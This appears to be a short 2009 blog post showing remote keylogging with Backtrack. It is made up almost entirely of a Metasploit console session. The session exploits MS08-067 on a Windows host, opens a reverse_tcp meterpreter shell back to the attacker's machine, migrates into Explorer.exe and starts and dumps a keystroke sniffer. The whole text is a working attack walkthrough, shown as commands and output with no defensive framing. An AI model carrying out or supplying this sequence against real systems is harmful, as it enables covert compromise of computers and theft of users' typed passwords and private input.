Friday, November 13, 2009

Remote Keylogging with Backtrack

Remote Keylogging

$ msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139

msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.

meterpreter > getpid
Current pid: 316

meterpreter > grabdesktop
Trying to hijack the input desktop…

meterpreter > keyscan_start
Starting the keystroke sniffer…

meterpreter > keyscan_dump
Dumping captured keystrokes…


This is a test of the keystroke logger I am typing this inside of notepad.